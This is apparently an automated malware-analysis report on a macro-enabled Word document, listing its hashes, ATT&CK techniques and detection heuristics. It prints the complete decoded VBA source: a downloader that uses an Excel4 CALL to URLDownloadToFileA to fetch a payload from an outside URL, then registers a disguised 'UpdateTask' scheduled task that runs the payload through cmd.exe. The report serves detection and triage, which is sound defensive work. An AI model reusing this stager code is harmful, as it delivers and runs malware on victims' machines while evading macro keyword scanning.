Office (OOXML) malware analysis — malicious · 36a5b169d86aaa33

MALICIOUS

Office (OOXML)

23.4 KB Created: 2021-06-04 17:58:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-13

MD5: bc68125efd29a1fb70bf09ffbfabf494 SHA-1: 5ff6117aab34251f0629caab7d5709e8b9d7bbed SHA-256: 36a5b169d86aaa3365274386521167cb598d007d18ac83bfc8553946454fee2c

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that leverage CreateObject and URLDownloadToFile to download a payload from 'http://dumpco.re/lab/messagebox.dmp' to a temporary file. It then attempts to schedule this payload to execute using cmd.exe and the Windows Task Scheduler, indicating a downloader or droppper functionality.

Heuristics 8

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

    x.Visible = False
    x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
    x.Quit

VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Matched line in script
```
    x.Visible = False
    x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)")
    x.Quit
```
VBA injects an Excel-4 macro CALL to a download/exec API critical OLE_VBA_XLM_CALL_INJECTION

VBA writes Excel-4 (XLM) =CALL() formulas targeting urlmon URLDownloadToFile / Shell32 ShellExecute and runs them. This VBA-to-XLM bridge downloads and executes a payload while keeping the API names out of normal VBA keyword scanning.
Matched line in script
```
    Set x = CreateObject("Excel.Application")
    x.Visible = False
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set x = CreateObject("Excel.Application")
    x.Visible = False
```

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

    Dim Action: Set Action = td.Actions.Create(0)
    Action.Path = "C:\Windows\System32\cmd.exe"
    Action.Arguments = "/c start " & p & " /c vshost.exe"

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

Private Sub CommandButton1_Click()
    p = Environ("USERPROFILE") & "\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{" & r(8) & "-" & r(4) & "-" & r(4) & "-" & r(12) & "}.tmp"

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://dumpco.re/lab/messagebox.dmp Referenced by macro
- http://dumpco.�Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1900 bytes
SHA-256: `b9635b89b89d2aeb456123512213e0ed8be039f851e483abedbb00f3fc227d93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton" Private Function r(l As Integer) As String For i = 1 To l Randomize If Int(2 * Rnd + 0) = 1 Then r = r & Chr(Int((90 - 65 + 1) * Rnd + 65)) Else r = r & Chr(Int((57 - 48 + 1) * Rnd + 48)) End If Next i End Function Private Sub CommandButton1_Click() p = Environ("USERPROFILE") & "\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{" & r(8) & "-" & r(4) & "-" & r(4) & "-" & r(12) & "}.tmp" Set x = CreateObject("Excel.Application") x.Visible = False x.ExecuteExcel4Macro ("CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""http://dumpco.re/lab/messagebox.dmp"",""" & p & """,0,0)") x.Quit Set service = CreateObject("Schedule.Service") Call service.Connect Dim td: Set td = service.NewTask(0) td.settings.StartWhenAvailable = True td.settings.Hidden = False Dim triggers: Set triggers = td.triggers Dim trigger: Set trigger = triggers.Create(1) Dim startTime: ts = DateAdd("s", 1200, Now) startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2) trigger.StartBoundary = startTime trigger.ID = "TimeTriggerId" Dim Action: Set Action = td.Actions.Create(0) Action.Path = "C:\Windows\System32\cmd.exe" Action.Arguments = "/c start " & p & " /c vshost.exe" Call service.GetFolder("\").RegisterTaskDefinition("UpdateTask", td, 6, , , 3) End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	26112 bytes
SHA-256: `57cbcb83a246dae7fc4cc5be7c86f81c206b56dda793532bb4cf70cab62b7f8a`

Open this report in the interactive analyzer, or submit your own file for analysis.